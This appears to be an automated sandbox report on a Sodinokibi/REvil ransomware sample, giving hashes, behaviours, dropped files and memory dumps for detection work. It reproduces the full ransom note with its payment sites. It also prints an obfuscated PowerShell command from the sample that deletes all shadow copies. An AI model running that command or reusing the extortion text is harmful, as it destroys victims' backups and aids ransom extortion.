Analysis

  • max time kernel
    130s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-09-2024 05:01

General

  • Target

    ef1ca1995495a6fad440bbc08ff3f119_JaffaCakes118.exe

  • Size

    179KB

  • MD5

    ef1ca1995495a6fad440bbc08ff3f119

  • SHA1

    7ba2c18108be1d12a29f090cc1f96f41908ecf6d

  • SHA256

    6eb992c4c8453e929ebc737780067f78e50a18934358e44db6d95fca3106e8e2

  • SHA512

    558a13b2ef020c246bd840816c983fc8f2e67fb1f59dba1dbb12689a8cba7cb217b190ebedb27dad01b209a6a99fb57df1799f894ecd6f35860e5764fc2f936a

  • SSDEEP

    3072:QCmB1vuTljjCAj3jrAprhFmyvEjQDKaUznxQaPx2oL+Bpvjrlc:4BlICIwhFjED39jujxc

Malware Config

Extracted

Path

C:\Users\3nhsb6a3-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 3nhsb6a3. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/58717A77FB0F58A8 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/58717A77FB0F58A8 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: X653ns7ZrsezIT6sCmoQ9f1yFvgpcoYF22R297JtNEmKgw7apBlD7kRvev/iS0Mu gJhWSso+Hr07IYajrAY2kCggyv74uFDsygu5x8msAFzs76y0sDQH+keFN85S1XWk UytKhnrwDE0RskhP3ARLkfgVoU5sZqazkafa4QRbhwiH+BL8FrNzpYJH7z9FSLx3 vOyefhjJrVD78ACK+f0Yz0H2M+pOh18fz4m0ZTtVO6cBKrWc+CVZm4Y8/ewk34L7 FiDwNxVX5mVCozUnCg18ZaSQ4nZ2btDeVhTepUcK0SEQa6oAOePliCQeM+BSO82f UkeB/rkeTAAu2SrwJFa5+pcCiPAb58WfcHcVd/l5pQOkdTYl2ZkAWucS58Zxv3WP wVIFEWh4KPbROZH2t5ZCyILvH2Tm2OdxaBpReeBHYf4G8Td1qcsY+glTxOQkpoRh cWY2Ume1UTdXxEJf8af5ecyxEbi2oqecB5sEb/HYrNc4ReypJLJjVmZLFUKs5ShZ uEI8dreCknWto3rqtsJBFMQTTIZjnSoIhFDUczCNPYIkTiQ58m52B4P6pHqHlzqn +KnvVtemVCXjmI5qwPc0zRLzmM4Pt7ZQAwUVEXiUazpar7/aowtZGeBWT5w/EujN eSIoE6jULtTZpeYJcSTSW860i40M2+b4l6qiUp3R1IMJHDOa3+0vE9EsucrxTd6b ciDG6J6R1QRaP/YTM+bpCutSh2gfB9Fa7FlVP8m9m8xjEFFenG/gO9WDjTS42fPo 2d4Ia/Rs+kueEGcRGHpmtstX1n2dffWpMTu0l99JBKVSh8n3RJAcWvsrtA+1sNL7 +6Gj4aD19v/32eNEKbycaK/hH8q+OZzL6fnMvWk9sc9NUn/TA4kb2maVxZ/fpS5M QT7rG+DVw/BxfbVMkgLRoTmEaxYzapZ8Fzd39pzAplMKu4qVETtFd9gAIRe6puwA sEDfR76Bnecjpevb/DDlQdtT6b49CwKlD7GNTq+zjUWLTTC84rmbp4n2FrVVNTUp sjmUsklOZDKxYFfjanOzPo9WpVxG0XnARePN23Yo8NtMjfQD4oWehF0gOmj7aBUn VkoKeQYoa/P4s3itjvDhXiUxfJlbAJ5yk8yL+4ILyaALZIkEalHlyGeXqIc3ockt AlQlbVOQaH+Pp1uSkhmsL0xkGiASDGNdkf4ulSYvgzcklJjsctCmH2h+ea1HDvnw /3S0Utv4S//SEan59R8= Extension name: 3nhsb6a3 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/58717A77FB0F58A8

http://decryptor.top/58717A77FB0F58A8

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 26 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ef1ca1995495a6fad440bbc08ff3f119_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ef1ca1995495a6fad440bbc08ff3f119_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2672
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2656
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2544

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\3nhsb6a3-readme.txt

      Filesize

      6KB

      MD5

      afd0df811ec17a73d471b8b5323be18c

      SHA1

      3eac2db6354e8e6d73d181e2ae3ad31b2d4dbf3e

      SHA256

      9c3bce88e0002cf11257dee49bdd89fc17e0545c95aa9b0052967c3e7eafa1d8

      SHA512

      559d5f212c270d134ec6c42d2c2b26e49a0817d7622263b33b010d5f84b4dd9009b3e5ba0ab0644281b5d49939d33f8bf285332b181472e8249596defa84ff37

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      0c9fb4e2245f08c4ffa81a10b160e46a

      SHA1

      31db3f62bb185f8e384d78a2ecd10d0c7dab022f

      SHA256

      e139c301c5a410bdbd43181cbd21042b3496af0d17cdd983e9cc49455ef34de1

      SHA512

      7098638439b4470d2292b3c02a697d81414b4cc195979d93b94083a3bf3bb48e7781288678a9c9079972c334c38df8dffe0b2f310e8595fad6ff20fa31400ff6

    • C:\Users\Admin\AppData\Local\Temp\Cab673D.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar677F.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      191KB

      MD5

      c87d8abd3c0af676a100c8982b1f4ffc

      SHA1

      8fb9c1130a657e622191fb6457bc9253a31620e3

      SHA256

      4076b21cd80388334ca8ae59a4c2a2ea9969b4f4a5045e5a9743f42c0c48b174

      SHA512

      5c5e355ed730240c9c89395887fb27258efb100263bb18f96655f670e5708f86292cbd806b1e70a95e76e13c12906cd6bf9159c1026681fbbd86e67d03aa298c

    • \??\PIPE\srvsvc

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • memory/468-20-0x0000000000280000-0x0000000000281000-memory.dmp

      Filesize

      4KB

    • memory/468-4-0x0000000000280000-0x0000000000281000-memory.dmp

      Filesize

      4KB

    • memory/468-2-0x00000000001D0000-0x00000000001D1000-memory.dmp

      Filesize

      4KB

    • memory/468-10-0x0000000002630000-0x0000000002739000-memory.dmp

      Filesize

      1.0MB

    • memory/468-11-0x0000000000290000-0x0000000000296000-memory.dmp

      Filesize

      24KB

    • memory/468-12-0x0000000000290000-0x0000000000296000-memory.dmp

      Filesize

      24KB

    • memory/468-6-0x0000000000D70000-0x0000000000E0F000-memory.dmp

      Filesize

      636KB

    • memory/468-7-0x0000000000E10000-0x0000000000F3D000-memory.dmp

      Filesize

      1.2MB

    • memory/468-1-0x00000000001C0000-0x00000000001CA000-memory.dmp

      Filesize

      40KB

    • memory/468-5-0x0000000000A80000-0x0000000000B49000-memory.dmp

      Filesize

      804KB

    • memory/468-9-0x0000000000290000-0x0000000000296000-memory.dmp

      Filesize

      24KB

    • memory/468-3-0x0000000000270000-0x0000000000271000-memory.dmp

      Filesize

      4KB

    • memory/468-8-0x0000000000870000-0x000000000088F000-memory.dmp

      Filesize

      124KB

    • memory/2672-23-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/2672-26-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

      Filesize

      4KB

    • memory/2672-27-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/2672-28-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/2672-29-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/2672-25-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/2672-24-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/2672-22-0x0000000001E40000-0x0000000001E48000-memory.dmp

      Filesize

      32KB

    • memory/2672-21-0x000000001B240000-0x000000001B522000-memory.dmp

      Filesize

      2.9MB

    • memory/2672-19-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/2672-18-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

      Filesize

      4KB